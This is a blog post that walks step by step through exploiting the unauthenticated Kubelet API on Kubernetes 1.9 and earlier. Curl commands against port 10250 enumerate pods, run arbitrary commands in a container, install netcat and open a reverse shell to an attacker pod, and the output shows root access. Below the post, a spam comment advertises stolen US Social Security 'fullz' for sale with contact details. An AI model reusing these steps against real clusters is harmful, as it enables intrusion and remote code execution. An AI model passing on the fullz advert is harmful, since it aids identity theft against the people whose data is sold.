Kubelet api by default allows to be accessed with anonymous auth, no keys , no password, nothing is needed.
This is what you are going to need to reproduce this :
1) Running kubernetes <=1.9 , it has been fixed on version 1.10: https://github.com/kubernetes/kubernetes/pull/59666
2) Kubelet api port must be exposed to the internet or to your local network, the port 10255 and 10250
3) rbac rules misconfigured or not even present.
4) A cluster to test, I recommend installing minikube.
5) You need to find a container that is not read only to install stuff, but even if it's not read only, you can get a lot of info from it like secrets and aws iam information.
So, let's do this, I did this on minikube just to play and prove the concept. That's the easiest way to play with this vulnerability. So go ahead and install minikube or you can run this on your cluster.
Once you have your minikube installed , you need to the ip address, get it with
angelo http://poc-hack.blogspot.co.uk/:~ minikube ip
Mine is 192,.168.99.100, yours might be different. In order to do the curl's below, you are going to need the pod name and the id.
So let's launch 2 pods, one with the vulnerable host and the other one that will be waiting our reverse shell.
1) Launch the evil container that will be listening for our reverse shell.
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run evil --image=centos -it /bin/bash
2) Lauch the hacked container that we will use to hack into.
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run hacked --image=centos -it /bin/bash
The pod name is "hacked" and the pod id you can get with :
angelo http://poc-hack.blogspot.co.uk/:~ kubectl get pods
NAME READY STATUS RESTARTS AGE
hacked-65d6998b6c-rgl28 1/1 Running 1 48m
evil-7d7fff7d4c-5lmfz 1/1 Running 1 1
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28"
If you are wondering how are you going to get this information from outside, this is how :
angelo http://poc-hack.blogspot.co.uk/:~ curl --insecure \
https://kube-node-here:10250/pods | jq
In my case, that command would translate to 192.168.99.100 because that's my minikube ip, in a real case scenario, that would be the ip of the master node and this is to get the pod names:
angelo http://poc-hack.blogspot.co.uk/:~ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].spec.containers[].name
"mongodb"
"external-evil-host"
"hacked"
"sidecar"
"dnsmasq"
"kubedns"
"kubernetes-dashboard"
"storage-provisioner"
"kube-addon-manager"
And this is how to get the pod ids :
angelo http://poc-hack.blogspot.co.uk/:~ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].metadata.name
"mongodb-68cbf975f7-45kjh"
"external-evil-host-78d68f7789-2dmvw"
"hacked-6565c4954f-wdj4x"
"kube-dns-54cccfbdf8-dvtcm"
"kubernetes-dashboard-77d8b98585-mtpp9"
"storage-provisioner"
"kube-addon-manager-k8sdemo"
From the command above you can get the pod id and name.Now let's get into the interesting part.
Open 3 tabs on your terminal, one with a shell on the hacked container, one on the evil container and another one where you are going to run lots of curl commands.
The first thing you are going to do is to create a file a test. Run this on your localhost.
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=touch /hello_world"
Now check your hacked container shell, and check if the file hello_world was created :
angelo http://poc-hack.blogspot.co.uk/:~ kubectl exec -ti hacked-65d6998b6c-rgl28 /bin/bash
[root@hacked-65d6998b6c-rgl28 /]#
[root@hacked-65d6998b6c-rgl28 /]# ls -la /hello_world
-rw-r--r-- 1 root root 0 Mar 22 16:22 /hello_world
Alright, now that we know that all is well and working, let's install nc on that hacked box, so we can launch a reverse shell:
1) Install nc in case it's not there yet.
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
2) Do the same for the evil container (execute this on your localhost):
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) "
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
3) Prepare the reverse shell connection on your evil host (execute this on your evil container, you need to get the ip address, so you can use on the other container to connect to this one:
[root@evil-ccb5dd4fc-tqf9s /]# ifconfig | grep inet | head -n1
inet 172.17.0.4 netmask 255.255.0.0 broadcast 0.0.0.0
[root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
4) Now let's try to run a reverse shell and get shell access to the container
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=nc -c /bin/sh 172.17.0.4 6666"
6) Now go to the evil host and you should see the connecting from the hacked box:
root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
id
uid=0(root) gid=0(root) groups=0(root)
And that's it, you are inside, game over.
ReplyDeleteExcellent article.Thanks for sharing....
Docker and Kubernetes Online Training
Hello Everyone !
ReplyDeleteUSA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.
All SSN's are Tested & Verified.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers
->Hope for the long term business
->You can buy for your specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Our staff makes sure you get best to perfect vape packaging and our experienced designers will let you have the perfect designs. You will be provided with a 3D image to grant your design and once you are fully contented
ReplyDelete